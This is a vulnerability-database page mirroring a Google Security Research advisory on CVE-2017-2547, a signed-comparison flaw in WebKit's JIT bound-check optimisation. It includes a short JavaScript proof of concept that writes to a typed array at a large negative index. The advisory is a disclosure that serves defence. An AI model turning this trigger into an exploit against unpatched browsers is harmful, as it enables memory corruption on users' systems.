Vulners
Lucene search
WebKit JSC Jit Optimization Check Failure
🗓️ 15 Jun 2017 00:00:00Reported by Google Security ResearchType 
packetstorm🔗 packetstormsecurity.com👁 44 Views
| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
 | WebKit JSC - JIT Optimization Check Failed in IntegerCheckCombiningPhase::handleBlock Exploit | 17 Jun 201700:00 | – | zdt |
 | Apple iOS < 10.3.2 Multiple Vulnerabilities | 17 May 201700:00 | – | nessus |
| Safari < 10.1.1 Multiple Vulnerabilities | 18 May 201700:00 | – | nessus |
| Apple iOS < 10.3.2 Multiple Vulnerabilities | 18 May 201700:00 | – | nessus |
| GLSA-201706-15 : WebKitGTK+: Multiple vulnerabilities | 8 Jun 201700:00 | – | nessus |
| macOS : Apple Safari < 10.1.1 Multiple Vulnerabilities | 23 May 201700:00 | – | nessus |
| Linux Distros Unpatched Vulnerability : CVE-2017-2547 | 24 Aug 202500:00 | – | nessus |
 | About the security content of iOS 10.3.2 | 15 May 201700:00 | – | apple |
| About the security content of Safari 10.1.1 | 15 May 201700:00 | – | apple |
| About the security content of iOS 10.3.2 - Apple Support | 20 Jun 201710:37 | – | apple |
10
` WebKit: JSC: JIT optimization check failed in IntegerCheckCombiningPhase::handleBlock
CVE-2017-2547
When compiling Javascript code into machine code, bound checks for all accesses to a typed array are also inserted. These bound checks are re-optimized and the unnecessary checks are removed, which is performed by IntegerCheckCombiningPhase::handleBlock.
For example, when the following JavaScript code is compiled, there are all bound checks for 8, 5, 2, but after the optimization, the checks for 5 and 2 are removed, and the only check for 8 will remain.
function f() {
let arr = new Uint32Array(10);
for (let i = 0; i < 0x100000; i++) {
parseInt();
}
arr[8] = 1;
arr[5] = 2;
arr[2] = 3;
}
f();
Note: parseInt is for forcing to start the JIT optimization.
Here's a snippet IntegerCheckCombiningPhase::handleBlock.
void handleBlock(BlockIndex blockIndex)
{
...
if (range.m_count) {
if (data.m_addend > range.m_maxBound) {
range.m_maxBound = data.m_addend;
range.m_maxOrigin = node->origin.semantic;
} else if (data.m_addend < range.m_minBound) {
range.m_minBound = data.m_addend;
range.m_minOrigin = node->origin.semantic;
}
...
}
The problem is that the check |data.m_addend > range.m_maxBound| is a signed comparison.
PoC:
function f() {
let arr = new Uint32Array(10);
for (let i = 0; i < 0x100000; i++) {
parseInt();
}
arr[8] = 1;
arr[-0x12345678] = 2;
}
f();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jun 2017 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.56117